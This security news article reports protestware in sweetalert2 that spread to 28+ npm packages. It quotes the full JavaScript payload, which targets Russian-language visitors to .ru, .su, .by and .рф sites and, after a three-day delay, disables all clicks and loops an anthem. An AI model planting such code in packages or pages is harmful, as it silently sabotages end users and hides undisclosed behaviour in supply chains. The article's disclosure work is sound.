28+ New Packages Used by Threat Actors to Spread Protestware

Socket’s Threat Research Team has uncovered a significant supply chain security incident involving protestware that has spread across at least 28 new npm packages with nearly 2,000 versions.

The malicious code targets Russian-language users visiting Russian or Belarusian websites, disabling UI interactions and playing the Ukrainian national anthem.

This represents a concerning example of how political activism in software can propagate undetected through dependency chains, affecting unsuspecting developers and end users.

Technical Analysis of the Protestware Mechanism

The protestware operates through a sophisticated conditional check embedded deep within packages containing over 100,000 lines of code.

The malicious script requires three specific conditions to activate: the user must be using a browser, have Russian language settings, and be visiting domains with .ru, .su, .by, or .рф extensions.

The core malicious code implements a time-delayed activation mechanism:

javascriptif (typeof window !== 'undefined' && /^ru\b/.test(navigator.language) && location.host.match(/\.(ru|su|by|xn--p1ai)$/)) {
    var now = new Date();
    var initiationDate = localStorage.getItem('swal-initiation');
    if (!initiationDate) {
        localStorage.setItem('swal-initiation', "".concat(now));
    } else if ((now.getTime() - Date.parse(initiationDate)) / (1000 * 60 * 60 * 24) > 3) {
        setTimeout(function () {
            document.body.style.pointerEvents = 'none';
            var ukrainianAnthem = document.createElement('audio');
            ukrainianAnthem.src = 'https://flag-gimn.ru/wp-content/uploads/2021/09/Ukraina.mp3';
            ukrainianAnthem.loop = true;
            document.body.appendChild(ukrainianAnthem);
        }, 500);
    }
}

The script waits three days before activation, ensuring only repeat visitors are affected. Once triggered, it disables all mouse interactions by setting pointerEvents it to ‘none’ and plays the Ukrainian anthem in a continuous loop.

Supply Chain Propagation and Security Implications

The protestware originated from the popular sweetalert2 package, which has over 700,000 weekly downloads.

The package’s author, limonte, transparently disclosed the protestware functionality beginning with version 11.6.14, which was published three years ago, during Russia’s invasion of Ukraine.

However, the code has since propagated to numerous other packages without disclosure.

Affected packages include MeshCentral (16,895 downloads), Qumra-UI (2,074 downloads), and Alurkerja-UI (1,521 downloads), among others.

Many of these packages appear to have copied code from sweetalert2 without understanding or documenting the embedded protestware functionality.

Socket has classified these packages as malware due to their undocumented behavior and potential to disrupt the user experience severely.

The incident highlights critical supply chain vulnerabilities, where political activism code can spread undetected through dependency networks, affecting developers and users who may be unaware of its presence or intent.